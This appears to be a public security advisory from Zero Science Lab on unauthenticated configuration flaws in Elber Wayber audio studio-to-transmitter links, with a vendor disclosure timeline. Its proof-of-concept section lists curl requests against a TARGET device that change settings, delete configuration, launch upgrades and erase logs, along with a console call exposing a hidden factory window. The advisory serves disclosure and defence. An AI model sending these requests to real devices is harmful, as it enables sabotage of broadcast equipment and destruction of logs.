Lucene search

K
zeroscienceGjoko KrsticZSL-2024-5823
HistoryApr 17, 2024 - 12:00 a.m.

Elber Wayber Analog/Digital Audio STL 4.00 Device Config

2024-04-1700:00:00
Gjoko Krstic
zeroscience.mk
61
elber wayber
audio stl
unauthenticated configuration
client-side disclosure
vulnerable versions
gjoko krstic
zero science lab
dos
privilege escalation
system access
firmware

7.3 High

AI Score

Confidence

Low

Title: Elber Wayber Analog/Digital Audio STL 4.00 Device Config
Advisory ID: ZSL-2024-5823
Type: Local/Remote
Impact: Security Bypass, Privilege Escalation, System Access, DoS
Risk: (5/5)
Release Date: 17.04.2024

Summary

Wayber II is the name of an analogue/digital microwave link able to transport a Mono or a MPX stereo signal from studio to audio transmitter. Compact and reliable, it features very high quality and modern technology both in signal processing and microwave section leading to outstanding performances.

Description

The device suffers from an unauthenticated device configuration and client-side hidden functionality disclosure.

Vendor

Elber S.r.l. - <https://www.elber.it>

Affected Version

Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501)
Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516)
Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516)
Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501)
Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350)
Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342)
Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131)

Tested On

NBFM Controller
embOS/IP

Vendor Status

[18.08.2023] Vulnerability discovered.
[20.08.2023] Vendor contacted.
[29.09.2023] No response from the vendor.
[09.12.2023] Vendor contacted.
[02.02.2024] No response from the vendor.
[16.03.2024] Vendor contacted.
[16.04.2024] No response from the vendor.
[17.04.2024] Public security advisory released.

PoC

elber_wayber_idor.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://packetstormsecurity.com/files/178143/Elber-Wayber-Analog-Digital-Audio-STL-4.00-Insecure-Direct-Object-Reference.html&gt;
[2] <https://cxsecurity.com/issue/WLB-2024040053&gt;

Changelog

[17.04.2024] - Initial release
[22.05.2024] - Added reference [1] and [2]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>Elber Wayber Analog/Digital Audio STL 4.00 Device Config


Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501)
                  Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516)
                  Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516)
                  Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501)
                  Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350)
                  Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342)
                  Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131)

Summary: Wayber II is the name of an analogue/digital microwave link
able to transport a Mono or a MPX stereo signal from studio to audio
transmitter. Compact and reliable, it features very high quality and
modern technology both in signal processing and microwave section leading
to outstanding performances.

Desc: The device suffers from an unauthenticated device configuration and
client-side hidden functionality disclosure.

Tested on: NBFM Controller
           embOS/IP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2024-5823
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5823.php


18.08.2023

--


# Config fan
$ curl 'http://TARGET/json_data/fan?fan_speed=&amp;fan_target=&amp;warn_temp=&amp;alarm_temp=''
Configuration applied

# Delete config
$ curl 'http://TARGET/json_data/conf_cmd?index=4&amp;cmd=2'
File delete successfully

# Launch upgrade
$ curl 'http://TARGET/json_data/conf_cmd?index=4&amp;cmd=1'
Upgrade launched Successfully

# Log erase
$ curl 'http://TARGET/json_data/erase_log.js?until=-2
Logs erased

# Until:
# =0 ALL
# =-2 Yesterday
# =-8 Last week
# =-15 Last two weeks
# =-22 Last three weeks
# =-31 Last month

# Set RX config
$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&amp;freq_offset=0&amp;mute=1&amp;sq_thresh=-90.0&amp;dec_mode=0&amp;lr_swap=0&amp;preemph=0&amp;preemph_const=0&amp;deemph=0&amp;deemph_const=1&amp;ch_lr_enable=0&amp;ch_r_gain=0.0&amp;ch_l_gain=0.0&amp;ch_adj_ctrl=0&amp;ch_lr_att=1&amp;mpxdig_att=0&amp;pilot_trim=0.0&amp;mpxdig_gain=0.0&amp;rds_trim=0.0&amp;delay_enable=0&amp;local_rds=0&amp;output_delay=0&amp;pi_code=0___&amp;mpx1_enable=1&amp;mpx2_enable=1&amp;sca1_enable=1&amp;sca2_enable=0&amp;mpx1_att=0&amp;mpx2_att=0&amp;sca1_att=0&amp;sca2_att=0&amp;mpx1_gain=0.0&amp;mpx2_gain=0.0&amp;sca1_gain=0.0&amp;sca2_gain=0.0&amp;limiter_enable=false&amp;lim_1_gain=0.0+dB&amp;lim_1_th=0.0+kHz&amp;lim_1_alpha=0.0+%25&amp;setupTime=0.0+ms&amp;holdTime=0.0+ms&amp;releaseFactor=0.0+dB%2Fsec&amp;lim_2_en=false&amp;lim_2_gain=0.0+dB&amp;lim_2_th=0.0+kHz&amp;rds_gen=false&amp;rt_PI=&amp;rt_PS=&amp;rt_plus_en=false&amp;rt_line_A=&amp;rt_line_B=&amp;rt_AF=&amp;rf_trap=0&amp;output_trap=0'
RX Config Applied Successfully

# Show factory window and FPGA upload (Console)
&gt; cleber_show_factory_wnd()

# Etc.
</p></body></html>

7.3 High

AI Score

Confidence

Low